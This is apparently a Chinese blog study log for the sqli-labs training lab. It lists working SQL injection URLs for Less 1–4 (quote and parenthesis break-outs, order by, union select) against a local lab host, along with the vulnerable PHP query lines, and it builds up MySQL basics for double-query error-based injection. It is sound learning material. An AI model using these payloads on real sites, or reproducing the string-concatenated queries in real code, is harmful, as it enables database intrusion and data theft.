
Sqli-labs 学习(长期更新)

14 Feb 2019 » security

[TOC]

Less - 1 (GET字符型注入)

http://10.211.55.7/web/sqli-labs/Less-1/index.php?id=2' order by 3 -- s

http://10.211.55.7/web/sqli-labs/Less-1/index.php?id=-2' union select 1,2,database()-- s

# index.php 源代码（注入根因：用户可控的 $id 未经参数化，直接拼接进 SQL 字符串；后面各关的源码都是同样的问题，只是包裹 $id 的引号/括号不同）
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

Less - 2 (GET数字型注入)

http://10.211.55.7/web/sqli-labs/Less-2/index.php?id=2 order by 3 -- s

http://10.211.55.7/web/sqli-labs/Less-2/index.php?id=-2 union select 1,2,database()-- s

# index.php 源代码
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

Less - 3 (单引号变形-字符型注入)

http://10.211.55.7/web/sqli-labs/Less-3/index.php?id=1%27) order by 3--%20s

http://10.211.55.7/web/sqli-labs/Less-3/index.php?id=-1%27) union select 1,2,database()-- s

# index.php 源代码
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

Less - 4 (基于错误-双引号-字符型)

http://10.211.55.7/web/sqli-labs/Less-4/index.php?id=1") order by 3-- s

http://10.211.55.7/web/sqli-labs/Less-4/index.php?id=-1") union select 1,2,database()-- s

# index.php 源代码（注意 $id 先在上一行被包上双引号，再拼接进 SQL）
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=(”$id“) LIMIT 0,1";

Less - 6 (双注入-双引号-字符型)

SQL 基础

mysql>select count(*) from information_schema.tables;

count()  // 返回行数

count

mysql>select rand();

rand() // 返回一个大于等于 0、小于 1 的随机数

rand()

mysql>select table_name,table_schema from information_schema.tables group by table_schema;

group by // 按照指定的列对结果进行分组。这里可以看到输出结果以 table_schema 的首字符排序，每个数据库只输出其中的第一个表。（注意 table_name 未出现在 GROUP BY 中，在启用了 ONLY_FULL_GROUP_BY 的 MySQL 上这条语句会直接报错。）

group_by

#  显示的是当前的数据库
mysql>select group_concat(0x3a,0x3a,(select database()),0x3a,0x3a)

group_concat

# 我们可以给 group_concat(0x3a,0x3a,(select database()),0x3a,0x3a) 取一个短一点的名字 
mysql>select group_concat(0x3a,0x3a,(select database()),0x3a,0x3a)name;

name

# 现在我们加入一些随机性,
mysql>select group_concat(0x3a,0x3a,(select database()),0x3a,floor(rand()))name;

rand()    // 获取随机数
floor()   // 取整

floor

# 这条语句会为 information_schema.columns 中的每一行（即每个字段）输出一条记录，由此可以看到字段数（注意查询没有按库过滤，计入的是所有库的字段）
mysql>select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()))name from information_schema.columns;

information_schema.columns

# 这条语句会为 information_schema.tables 中的每一行（即每张表）输出一条记录，由此可以看到表数（同样没有按库过滤）
mysql>select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()))name from information_schema.tables;

information_schema.tables

# 接下来我们多加一个聚合函数 count()
mysql>select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name;